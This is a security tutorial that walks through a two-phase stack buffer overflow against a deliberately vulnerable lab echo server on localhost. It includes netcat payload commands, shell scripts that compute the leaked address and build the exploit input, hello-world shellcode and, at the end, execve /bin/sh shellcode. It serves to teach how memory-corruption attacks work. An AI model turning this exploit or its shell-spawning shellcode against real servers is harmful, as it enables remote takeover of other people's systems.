Note: All files needed for this tutorial can be found here.
Tutorial: a trivial stack-based buffer overflow in two phases
By H. Bos
Updated: September 2007, June 2008.
----------------------------------------------------------------------

This tutorial shows a trivial case of a two-phase attack that works on
systems with address space randomisation (ASR). The attack is a simple
network-based stack smashing exploit.

The reason for writing this tutorial is that students sometimes ask the
following questions when we are discussing the basics of buffer
overflows:

  "Surely, address space randomisation makes stack overflows
   impossible?"

  "How do you know the address of the buffer containing your
   shellcode? After all, you need this address a priori. Otherwise,
   where will you make the program jump?"

I stress that the example below is just one of many possibilities and
perhaps (hopefully) the easiest one to understand. It only serves to
demonstrate how you could make a simple stack smashing attack work on a
modern Linux distribution. Note, however, that it assumes that stack
smashing itself is not prevented. For instance, it will not work if
canary values are used to protect the stack. You may want to compile
with -fno-stack-protector to be sure.

Before you start, make sure you have installed the following tools (or
their equivalents): hexedit, hexdump, netcat, and nasm.
----------------------------------------------------------------------

Introduction
------------

In a 2-phase attack, a first connection is used to obtain the address
of a known value (in this case on the stack). This address is then used
to calculate the value to place in the return address field.

The vulnerable server is shown in vulnerable.c. It is a quick and dirty
implementation, with a bunch of debug messages you may ignore. But it
works and it is, in principle, a real network server.
You can make the server by typing:

    make

It should create an executable 'badbuf' that can be started with:

    badbuf <port>

For instance, start the server so as to make it listen on port 54321:

    debris: ../bufferoverflow>badbuf 54321

The vulnerable function is called oops(). It looks like this:

    int oops (int newsockfd)
    {
      int len;
      char buf [56];
      int i,n;

      len = 56;
      bzero(buf,len);
      n = read (newsockfd, buf, 255);   // overflow possible
      if (n < 0) error("ERROR reading from socket");

      // 'echo' the message
      if (len>255) len = 255;
      printf ("Echoing %d characters\n", len);
      for (i=0; i<len; i++)
      {
        // pretty dumb svr: echoes characters 1 at a time
        write(newsockfd, buf+i,1);
        if (n < 0) error("ERROR writing to socket");
      }
      return 0;
    }

A. The main idea
----------------------------------------------------------------------

Stack smashing is not complicated at all. It does require some
knowledge about how a stack frame is organised on our x86-based
machines:

- The stack grows from top (high addresses) to bottom (low addresses).
- When a function is called, the following information is found on the
  stack:
  * First, the parameters are pushed on the stack.
    [Actually, a small number of parameters can be passed via
    registers, but let us ignore that for now, as it is not very
    important for this tutorial.]
  * Second, the return address is pushed. This is the address that the
    CPU will jump to when the function returns.
  * Next, we find the saved frame pointer (EBP, which Intel calls the
    'extended base pointer'). The saved EBP points to the previous
    stack frame. More precisely, it points to the place in the
    previous stack frame where *that* frame has saved the previous
    EBP.
  * Finally, we find the space for local variables on the stack.
    Whenever the function declares a local variable (such as 'len' in
    the function 'oops()' above), the appropriate amount of memory is
    reserved. In the case of 'len', this will be 4 bytes. In the case
    of 'buf', 56 bytes, and so on.
Note that the size of buffer 'buf' in function oops() is 56B. We want
to overflow it in such a way that we get to control the program. In
other words, we want to feed it a chunk of data that overflows the
buffer 'buf' and puts a new address at the location that holds the
return address of the function. Then, when the function returns, it
will return to the address we provided, rather than to the location
from where the function call was made.

For simplicity, we will place our 'shellcode' in buf, so we want to
overwrite the return address with the address of buf. Then, when the
function returns, the CPU will jump to the beginning of 'buf' and start
executing the instructions that it finds there (i.e., *our* shellcode).

Unfortunately, modern OSs use ASR, so we do not know at which address
buf resides. So, we use a two-phase attack. First, we overflow the
buffer to make the program send us a stack address (the saved EBP
value). We then use this address to calculate the location of buf.

B. Finding the address to put in the return address field on the stack
----------------------------------------------------------------------

To do this, we overflow the buffer in such a way that a new value is
placed in the variable 'len' (which happens to sit just above 'buf').
This causes the program to output more data than it intended. For
instance, we send the following data to the server (assume that we have
saved the data in the file getaddress.inp):

    debris: ../bufferoverflow>hexdump -C getaddress.inp
    00000000  30 31 32 33 34 35 36 37  38 39 30 31 32 33 34 35  |0123456789012345|
    00000010  36 37 38 39 30 31 32 33  34 35 36 37 38 39 30 31  |6789012345678901|
    00000020  32 33 34 35 36 37 38 39  30 31 32 33 34 35 36 37  |2345678901234567|
    00000030  38 39 30 31 32 33 34 35  58 00 00 00              |89012345X...|

The input contains 56 ASCII characters (the digits 0-9, repeated),
followed by the 32-bit value 0x00000058 (in little endian).
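If you would rather not type these bytes into a hex editor, a file like
this can also be generated with a few lines of shell. The following is
only a minimal sketch and is not one of the tutorial's files: the names
put_byte and make_getaddress_payload are made up for illustration, and
the values 56 and 88 are simply the ones used in the text above. Raw
bytes are written through octal escapes, because that is the form of
escape that printf handles portably.

```shell
#!/bin/sh
# Sketch only: builds the phase-one input described above.
# The names below are illustrative and do not come from the tutorial files.
BUF_SIZE=56     # size of 'buf' in oops()
LEAK_LEN=88     # 0x58: number of bytes we want the server to echo

# Write one raw byte to stdout, given its numeric value (0-255).
# The value is converted to a three-digit octal escape for printf.
put_byte() {
    printf "\\$(printf '%03o' "$1")"
}

# Write the payload to stdout: BUF_SIZE digits (0-9, repeated), then
# LEAK_LEN as a 32-bit little-endian integer (low byte first).
make_getaddress_payload() {
    i=0
    while [ "$i" -lt "$BUF_SIZE" ]; do
        printf '%d' $(( i % 10 ))
        i=$(( i + 1 ))
    done
    n=$LEAK_LEN
    for k in 1 2 3 4; do
        put_byte $(( n & 255 ))
        n=$(( n >> 8 ))
    done
}

# Show the result as hex bytes; redirect to getaddress.inp to save it.
make_getaddress_payload | od -An -v -tx1
```

To create the input file itself, redirect the function's output:
make_getaddress_payload > getaddress.inp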
Because 'len' sits just above 'buf', this input will overwrite 'len'
with 0x58 and cause the program to 'echo' 0x58 = 88 characters, i.e.,
the buffer *plus* a fair share of the stack above it. Hopefully, this
yields something useful. We send the above input using the program
netcat ('nc') as follows (client and server are both running on the
same host):

    debris: ../bufferoverflow>cat getaddress.inp | nc 127.0.0.1 54321 | hexdump -C
    00000000  30 31 32 33 34 35 36 37  38 39 30 31 32 33 34 35  |0123456789012345|
    00000010  36 37 38 39 30 31 32 33  34 35 36 37 38 39 30 31  |6789012345678901|
    00000020  32 33 34 35 36 37 38 39  30 31 32 33 34 35 36 37  |2345678901234567|
    00000030  38 39 30 31 32 33 34 35  58 00 00 00 3c 00 00 00  |89012345X...<...|
    00000040  3c 00 00 00 d8 f5 ff bf  7a 89 04 08 04 00 00 00  |<.......z.......|
    00000050  a8 f5 ff bf c8 f5 ff bf                           |........|
    00000058

Yes, we found something useful: the saved EBP. It is the address
'd8 f5 ff bf' in line 00000040. How do I know this is the appropriate
address? Well, it is the first 4-byte number that *looks* like a stack
address above the 'buf' and 'len' variables. It is followed by a 4-byte
number that looks like an instruction address, so we are probably on
the right track.

You may wonder about the two 4B values between 'len' and the saved EBP.
Apparently, the compiler reserved this space for other variables. (It
is not very important, but you may suspect that they hold the amount of
data that was read, as the value is 0x3C = 60 bytes, which is exactly
the amount of data in getaddress.inp.)

As mentioned earlier, the 'old EBP' value saved on the stack points to
a specific place in the previous stack frame. Let us see:

    d8 f5 ff bf in little endian -> bffff5d8

We know the program, so we are able to find out the difference between
the value of the previous EBP and the location where it was stored in
the current frame. (If you don't know this precisely, it is not so hard
to find, either by analysis or by trial and error.)
In my case, this difference happens to be 0x50 = 80. Now, the
difference with the start of buf can also be easily calculated: EBP was
saved at

    0xbffff5d8 - 0x50 = 0xbffff588

We know (and/or see from our hexdump above) that the start of the
buffer is 68B (0x44) below the address at which EBP was stored, so we
have to patch in the address:

    0xbffff588 - 0x44 = 0xbffff544

I wrote a small shell script to calculate this. Simply copy in the
bytes as reported by the hexdump output above, and the result (in the
most useful order) will be printed:

    debris: ../bufferoverflow>calcAddr.sh d8 f5 ff bf
    44 F5 FF BF
    debris: ../bufferoverflow>

These hex numbers will be used later on.

*** SHORTCUT: if you hate typing and want to be really efficient, you
can use the following (somewhat cryptic) command:

    ./calcAddr.sh `cat getaddress.inp | nc 127.0.0.1 54321 |
        hexdump -C |
        grep -m 1 -o -G '[0-9a-f][0-9a-f][[:space:]][0-9a-f][0-9a-f][[:space:]][0-9a-f][0-9a-f][[:space:]]bf'`

This invokes calcAddr.sh on the first occurrence of an address like
?? ?? ?? bf in whatever we receive from the server. Don't you just love
Unix?

C. The shellcode
----------------------------------------------------------------------

Now we must provide a bit of 'shellcode' to be executed and patch in
the return address that we just calculated at the appropriate place. We
will do this using hexedit. Again, we want to send the shellcode in an
input and, with that same input, overwrite the return address to make
the CPU return to the start of 'buf' (which by then contains the
shellcode). So the malicious input we will generate looks like this:

    |----------|
    | 44F5FFBF |
    |----------|
    |          |
    |          |
    |shellcode |
    |          |
    |          |
    |----------|

The code in shellcode.asm should be suitable for this vulnerability. It
is easily small enough to fit in the 56B buffer. It does not do much
(it just prints 'hello world'), but that is not the point. Writing good
shellcode is an art, but a bit of knowledge of assembly should go a
long way.
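The top cell of the diagram and the gap between the shellcode and that
cell can also be produced without a hex editor. The sketch below is a
hypothetical stand-in and not the calcAddr.sh or attack.sh that come
with the tutorial files. It assumes the offsets measured in this
tutorial (0x50 from the leaked EBP value to its slot, 0x44 from that
slot down to buf, and 0x48 from buf up to the return address); on
another build these numbers will differ. The function names are made up
for illustration.

```shell
#!/bin/sh
# Sketch only; all names and offsets are assumptions taken from the text.
EBP_TO_SLOT=80   # 0x50: leaked EBP value minus the address where it is saved
SLOT_TO_BUF=68   # 0x44: saved-EBP slot minus the start of buf
RET_OFFSET=72    # 0x48: offset of the return address from the start of buf
BUF_SIZE=56      # size of 'buf' in oops()

# Print the address of buf as four little-endian hex bytes, given the four
# leaked bytes in the order they appear in the hexdump.
# Assumes shell arithmetic wider than 32 bits (true for bash and dash).
calc_buf_addr() {
    ebp=$(( 0x$4$3$2$1 ))        # reassemble the little-endian value
    buf=$(( ebp - EBP_TO_SLOT - SLOT_TO_BUF ))
    printf '%02X %02X %02X %02X\n' \
        $(( buf & 255 )) $(( (buf >> 8) & 255 )) \
        $(( (buf >> 16) & 255 )) $(( (buf >> 24) & 255 ))
}

# Write one raw byte to stdout, given as two hex digits.
put_hex_byte() {
    printf "\\$(printf '%03o' $(( 0x$1 )))"
}

# Usage: build_exploit <shellcode-file> <b0> <b1> <b2> <b3>
# Writes the shellcode, zero padding up to RET_OFFSET, then the four
# address bytes, all to stdout.
build_exploit() {
    scfile=$1
    shift
    size=$(( $(wc -c < "$scfile") ))
    if [ "$size" -gt "$BUF_SIZE" ]; then
        echo "shellcode does not fit in buf" >&2
        return 1
    fi
    cat "$scfile"
    while [ "$size" -lt "$RET_OFFSET" ]; do
        printf '\000'
        size=$(( size + 1 ))
    done
    for b in "$@"; do
        put_hex_byte "$b"
    done
}

calc_buf_addr d8 f5 ff bf    # prints: 44 F5 FF BF
```

Given a file with the raw shellcode bytes, the complete input could
then be produced with something like
build_exploit rawcode.bin 44 F5 FF BF > shellcode.inp
where rawcode.bin is a placeholder name. Note that the zero padding
also overwrites 'len', so the server echoes nothing on that connection.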
This is our program in assembly (shellcode.asm):

    [SECTION .text]
    global _start
    _start:
            jmp short stringaddress
    mystart:
            xor eax, eax    ;clean up the registers
            xor ebx, ebx
            xor edx, edx
            xor ecx, ecx
            mov al, 4       ;syscall 4 means a write
            mov bl, 1       ;stdout is 1
            pop ecx         ;get the address of the string from the stack
            mov dl, 13      ;length of the string
            int 0x80        ;do syscall
            xor eax, eax
            mov al, 1       ;syscall 1=exit (so we exit the shellcode)
            xor ebx,ebx
            int 0x80
    stringaddress:
            call mystart    ;puts the address of the string on the stack :)
            db "hello world!"

Now we want to get the machine code that corresponds to this code:

    debris: ../bufferoverflow>nasm -felf shellcode.asm
    debris: ../bufferoverflow>ld -s -o scode shellcode.o
    debris: ../bufferoverflow>objdump -d scode

    scode:     file format elf32-i386

    Disassembly of section .text:

    08048060 <.text>:
     8048060:   eb 19                   jmp    0x804807b
     8048062:   31 c0                   xor    %eax,%eax
     8048064:   31 db                   xor    %ebx,%ebx
     8048066:   31 d2                   xor    %edx,%edx
     8048068:   31 c9                   xor    %ecx,%ecx
     804806a:   b0 04                   mov    $0x4,%al
     804806c:   b3 01                   mov    $0x1,%bl
     804806e:   59                      pop    %ecx
     804806f:   b2 0d                   mov    $0xd,%dl
     8048071:   cd 80                   int    $0x80
     8048073:   31 c0                   xor    %eax,%eax
     8048075:   b0 01                   mov    $0x1,%al
     8048077:   31 db                   xor    %ebx,%ebx
     8048079:   cd 80                   int    $0x80
     804807b:   e8 e2 ff ff ff          call   0x8048062
     8048080:   68 65 6c 6c 6f          push   $0x6f6c6c65
     8048085:   20 77 6f                and    %dh,0x6f(%edi)
     8048088:   72 6c                   jb     0x80480f6
     804808a:   64                      fs
     804808b:   21                      .byte 0x21
     804808c:   5c                      pop    %esp
     804808d:   6e                      outsb  %ds:(%esi),(%dx)

Ok, that is just what we need. (The 'instructions' after the call are
not code at all: they are the bytes of the string, which objdump tries
to disassemble.) Let us stick the numbers from the middle column in a
file and call it shellcode.inp:

    debris: ../bufferoverflow>hexedit shellcode.inp
    00000000   EB 19 31 C0 31 DB 31 D2 31 C9 B0 04 B3 01 59 B2   ..1.1.1.1.....Y.
    00000010   0C CD 80 31 C0 B0 01 31 DB CD 80 E8 E2 FF FF FF   ...1...1........
    00000020   68 65 6C 6C 6F 20 77 6F 72 6C 64 20 0C

(Note that this dump is not byte-for-byte identical to the objdump
output: the length byte is 0C instead of 0D, and the string ends in
20 0C.)

We still have to make sure to add the return address at the appropriate
offset. The return address was calculated under (B).
We place it at the location that is just 4B up from where we found the
saved value of EBP (i.e., at offset 0x48):

    00000000   EB 19 31 C0 31 DB 31 D2 31 C9 B0 04 B3 01 59 B2   ..1.1.1.1.....Y.
    00000010   0C CD 80 31 C0 B0 01 31 DB CD 80 E8 E2 FF FF FF   ...1...1........
    00000020   68 65 6C 6C 6F 20 77 6F 72 6C 64 20 0C 00 00 00   hello world ....
    00000030   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
    00000040   00 00 00 00 00 00 00 00 44 F5 FF BF               ........D...

Now our exploit is ready. Let us send it to the badbuf server that is
still running:

    debris: ../bufferoverflow>cat shellcode.inp | nc 127.0.0.1 54321

At the server side, the result is that the server prints 'hello world'
and exits. The full run is shown below (it includes the output
generated on behalf of the first connection):

    debris: ../bufferoverflow>badbuf 54321
    Echoing 88 characters
    returned
    Echoing 0 characters
    hello world
    debris: ../bufferoverflow>

The exploit worked!

This is the end of the tutorial. We just have some additional comments.

*** SHORTCUT NOTE: use the script './attack.sh <port>' if you want to
automate this entire procedure. The script will send getaddress.inp,
extract the saved EBP value, calculate the address of our buffer, patch
the address into shellcode.inp, and send it to the server.

*** The hello world example shown above of course cannot be termed
'shellcode', as it does not give you a shell. The following shellcode
is more interesting. As I am switching from nasm to as, I will give
this example in GNU syntax:

    .section .text
    .global _start
    _start:
        /* we first jump to string address and then immediately return
           via a call, so that when we arrive at mystart, the address
           of the string will be on the stack. Clever.
         */
        jmp string_addr
    mystart:
        pop %ebx               /* get the string address */
        xor %eax,%eax          /* zero eax */
        movb %al, 7(%ebx)      /* write a NUL byte over the 'N' in the string */
        movl %ebx, 8(%ebx)     /* store the address of the string in XXXX */
        movl %eax, 12(%ebx)    /* store 0 (32 bits) in YYYY */
        movb $11,%al           /* syscall 11 = execve */
                               /* first argument (ebx) points to the file */
        leal 8(%ebx), %ecx     /* address of second argument in ecx */
        leal 12(%ebx), %edx    /* address of third argument in edx */
        int $0x80              /* do it */
    string_addr:
        call mystart
        .asciz "/bin/shNXXXXYYYY"

If you use this instead of the hello world example, you will get an
actual shell on the server.

Have fun!
HJB